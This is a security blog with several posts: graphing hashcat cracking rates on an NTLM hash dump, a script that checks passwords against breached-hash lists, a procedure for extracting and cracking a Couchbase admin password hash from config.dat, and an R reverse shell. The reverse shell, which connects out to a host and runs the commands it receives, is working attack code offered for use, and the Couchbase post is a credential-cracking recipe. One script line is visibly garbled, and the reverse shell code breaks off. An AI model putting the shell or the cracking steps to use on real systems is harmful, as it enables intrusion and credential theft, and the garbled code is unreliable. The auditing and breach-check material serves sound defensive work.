Thursday, December 26, 2019

Visualising password strength

We can plot a graph of how quickly passwords were cracked if we use the --status flag to hashcat. Here I'm using hashcrack (my preprocessor tool), but I've bolded the actual command:

C:\Users\jamie\Desktop\hashcrack>python -i defcon2010-ntlm.txt --status graphme -t ntlm
Running under win32
Reading file: C:\Users\jamie\Desktop\hashcrack\defcon2010-ntlm.txt
Cracking hash type 1000
Selected rules: l33tpasspro.rule, dict Top32Million-probable.txt, inc 7
Using dict and rules
cwd C:\Users\jamie\Desktop\hashcrack\hashcat-5.1.0
RUN: hashcat64.exe -a0 -m 1000 C:\Users\jamie\Desktop\hashcrack\defcon2010-ntlm.txt C:\Users\jamie\Desktop\hashcrack\dict\\\Top32Million-probable.txt -r C:\Users\jamie\Desktop\hashcrack\rules\\\l33tpasspro.rule  --loopback  -O --bitmap-max=26  -w3  --session hc   --status >> graphme
nvmlDeviceGetFanSpeed(): Not Supported

Which generates a file with passwords and status blocks every 10 seconds by default.

$ tail -f hashcat-5.1.0/graphme
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Session..........: hc
Status...........: Running
Hash.Type........: NTLM
Hash.Target......: C:\Users\jamie\Desktop\hashcrack\defcon2010-ntlm.txt
Time.Started.....: Tue Dec 24 10:48:55 2019 (4 mins, 1 sec)
Time.Estimated...: Tue Dec 24 13:05:44 2019 (2 hours, 12 mins)
Guess.Base.......: File (C:\Users\jamie\Desktop\hashcrack\dict\\\Top32Million-probable.txt)
Guess.Mod........: Rules (C:\Users\jamie\Desktop\hashcrack\rules\\\l33tpasspro.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#3.........:   390.4 MH/s (93.46ms) @ Accel:256 Loops:64 Thr:1024 Vec:1
Recovered........: 4301/28250 (15.22%) Digests, 0/1 (0.00%) Salts
Recovered/Time...: CUR:237,N/A,N/A AVG:1069,64148,1539561 (Min,Hour,Day)
Progress.........: 93888119434/3205101539547 (2.93%)
Rejected.........: 197258/93888119434 (0.00%)
Restore.Point....: 524289/32496543 (1.61%)
Restore.Sub.#3...: Salt:0 Amplifier:80448-80512 Iteration:0-64
Candidates.#3....: +26031966 -> Diciebat$
Hardware.Mon.#3..: Temp: 52c Util: 98% Core:1518MHz Mem:2504MHz Bus:4


A script I wrote can then be used to graph how quickly the passwords are recovered:

C:\Users\jamie\Desktop\hashcrack>python hashcat-5.1.0\graphme

Because we've used the frequency-ranked TopNMillion-probable list, we can see the graph shows a fair amount of passwords cracked very quickly. As a system administrator, it's these you need to worry about - get rid of the weak passwords and you improve the overall "fitness" of the population quite significantly.

You can also compare cracking approaches like this - provided you make sure each one starts with an empty pot file. Below is the longer run with the --nuke option to hashcrack, which runs a number of extra bits and bobs, like suffixes.

Thursday, December 19, 2019

Cheap and Cheerful Password Breach Check

Get the HIBP NTLM hashes ordered by hash, and unzip: 

 7z x pwned-passwords-ntlm-ordered-by-hash-v5.7z

Download and compile sgrep: 

Create the following python code: 

$ cat
import hashlib
import fileinput
import subprocess

for line in fileinput.input():
    line=line.rstrip()'md4', line.encode('utf-16le')).hexdigest()
    process = subprocess.Popen(['/home/jamie/sgrep', '-i',ntlmhash,'/home/jamie/pwned-passwords-ntlm-ordered-by-hash-v5.txt'],stdout=subprocess.DEVNULL)
    return_code = process.poll()
    if return_code is not None:
        if return_code == 0:
            print("Found '"+line+"' in breach")

And run with your password list: 

$ echo password | ./
Found 'password' in breach

And you can just omit the ntlmhash bit if you want to look up hashes directly, rather than plaintexts.

Tuesday, December 17, 2019

Cracking Couchbase Admin Password

First, find config.dat on the server. In config.dat, find the string "plain", e.g.

h m\0\0\0 plainm\0\0\00bl/nSj6e7vZS5KQqHmoTER7Z4cgTcDSL5vZTeaaFEAqCpxpLh m

take 0'b...'h - lose the initial '0' and the trailing 'h' - and base64 decode, then ASCII hex encode to get


salt is first 16 bytes , hmac result is next 20 bytes

salt 6e5fe74a3e9eeef652e4a42a1e6a1311
hmac 1ed9e1c81370348be6f65379a685100a82a71a4b

For hashcat construct as

hmac:salt, so like this for my example:


Then crack with hashcat mode 160 and --hex-salt :

hashcat64.exe -m 160 ..\salt-n-mac.txt ..\dict\Top32Million-probable.txt -w3 --hex-salt -O  -r rules\InsidePro-PasswordsPro.rule



How did we get here?

I should point out this comes from much trial and error and reading the erlang source code. If I could read erlang better, I would probably have taken less time to get there.

Saturday, July 13, 2019

Reverse Shell in 'R'

By underwhelming popular demand, here's a reverse shell for the 'R' language. Change IP address, port and also "cmd /c" if you're not running on Windows.

I may have stolen this off someone, but I can't find it now; many apologies if so.

See also

client <- function(){
    con <- socketConnection(host="", port = 1234, blocking=TRUE, server=FALSE, open="r+")
    while (TRUE){
      sendme <- readLines(con, n=1)
      output <- system(paste0("cmd /c ",sendme), TRUE)
      write_resp <- writeLines(output, con)